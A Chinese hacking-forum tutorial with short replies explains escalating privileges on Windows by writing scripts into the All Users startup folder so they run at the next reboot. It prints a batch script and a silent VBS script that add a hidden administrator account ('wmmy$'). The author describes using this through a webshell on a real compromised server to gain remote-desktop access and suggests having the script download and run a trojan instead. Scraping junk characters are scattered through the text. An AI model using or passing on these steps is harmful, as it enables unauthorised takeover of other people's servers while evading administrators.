返回列表 发帖

[原创教程] 3AST提权课程之启动项提权

大家好,我是完美蚂蚁 今天给大家带来的提权教程是5 J- e( ]5 \; p5 ~1 L/ L! J
启动 提权+ n  J% |; x' |9 L' l
C:\Docume~1\All Users\「开始」菜单\程序\启动
5 |2 o- ?3 @+ {( t4 b在这里必须有写入权限 否则此方法无效1 w- |7 y$ p: ]4 p& V
因为我是在网吧 这里显示不了路径
  G+ H2 B! {4 E, E; ]( P7 q/ k我去服务器上演示给大家看
9 m0 _# |4 }4 \9 S8 c大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的% d, R$ k4 }8 @
文件 从而运行我们的文件& ]1 U+ o4 a4 L4 r$ h4 P6 j" ~( I
这里有两中方式 第一种是批处理
5 R# Z2 {7 g8 H我们来看下目前 我机器上的用户组
$ F; t) i5 M+ N目前我们没有521这个用户
" ?0 P" N6 V4 E看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示8 u8 s, I% @( R7 d) v3 x: k$ M
大家看到了吧  如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
) i$ _) @/ p) Q- D9 H下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的/ g& j& T. g; p; Y' W5 v
大家看 已经成功加入了WMMY用户6 K8 y% G! U% Q1 D1 C6 d6 n, t
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了/ }) ?2 D0 E1 R5 G3 j, O' M
当前终端服务端口: 3389
- b9 X) P1 R3 E8 A1 e& d5 G系统自动登录功能未开启0 S8 k/ k' a; U% g
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
' `4 s. W- Q0 p# I/ DC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
. F$ @4 r% V9 O/ ?; y. r7 v第一种隐蔽性太差  我们就用第二种吧2 X$ P3 D- N$ L- \3 ^
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去. s# q" u9 S" c7 }: |* V; @
从而取得了3389的登陆权限' G& Z/ R  v, V; y6 [
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
/ ?6 p* C" d9 y& [: z; A基本原理都差不多  我就不多介绍了2 Q  L: E& ~0 k* R
教程结束```0 c9 G! k6 w8 Z8 f& g
@echo off0 ?0 n) d, Z9 f9 O
net user 521 521 /add
" {0 x7 N7 {% g- R6 rnet localgroup administrators 521 /add5 |; Y( B! J, {% h, A0 ^: M
" U, m0 O% B5 C3 G+ M" g
on Error Resume next+ r! G! E' l0 R# L# n
set wshshell=createobject("wscript.shell"). Y7 ^& ]( g4 Z; j" }; N5 ]  b2 W
a=wshshell.run("net user wmmy$ 1227 /add",0)8 [: X2 w+ f6 k* O2 c
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
9 [: i1 E7 w. }  I$ V) ^* |
/ G! h2 w; p3 U$ H4 R
6 m0 }5 z* X# Z+ u1 e  v点击下载
) {* k  e4 n; {! d' d0 c' {\" H
2

评分人数

  • 柔肠寸断

  • zhuyahui

不建议是用纳米~~很垃圾~。

TOP

+个分 能要是管理的权限啊~。

TOP

写的不错哦~~~~~
% e" W2 b1 D* f% T* e4 M: x$ M: X5 S( _7 T2 O- Z: P$ [, ]
昨天有事情没有上了
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

顶下~一下加这么多啊~BS下~:lol

TOP

顶下小柔
9 r! a# n0 X( y+ k, v看看~;P

TOP

返回列表